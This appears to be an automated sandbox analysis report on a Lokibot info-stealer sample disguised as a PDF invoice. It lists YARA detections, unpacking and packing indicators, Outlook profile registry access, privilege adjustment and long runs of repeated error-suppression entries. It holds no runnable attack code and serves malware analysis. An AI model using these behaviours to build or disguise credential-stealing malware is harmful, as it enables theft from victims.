              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_054F5C280_2_054F5C28
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040549C1_2_0040549C
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_004029D41_2_004029D4
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: String function: 00405B6F appears 42 times
              Source: PI_Nov9071011998_ENTRUSTpdf.exeBinary or memory string: OriginalFilename vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.241253841.0000000008720000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.234566938.0000000000C12000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTM.exe8 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exeBinary or memory string: OriginalFilename vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.500459878.0000000000A62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTM.exe8 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: PI_Nov9071011998_ENTRUSTpdf.exeBinary or memory string: OriginalFilenameTM.exe8 vs PI_Nov9071011998_ENTRUSTpdf.exe
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@302/2
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,1_2_0040434D
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI_Nov9071011998_ENTRUSTpdf.exe.logJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: PI_Nov9071011998_ENTRUSTpdf.exeVirustotal: Detection: 20%
              Source: unknownProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe 'C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe {path}
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: PI_Nov9071011998_ENTRUSTpdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.PI_Nov9071011998_ENTRUSTpdf.exe.c10000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.PI_Nov9071011998_ENTRUSTpdf.exe.c10000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 1.0.PI_Nov9071011998_ENTRUSTpdf.exe.a60000.0.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.a60000.1.unpack, telaPrincipal.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572, type: MEMORY
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_00C16283 push cs; retf 0_2_00C16284
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00A66283 push cs; retf 1_2_00A66284
              Source: initial sampleStatic PE information: section name: .text entropy: 7.69094003544
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
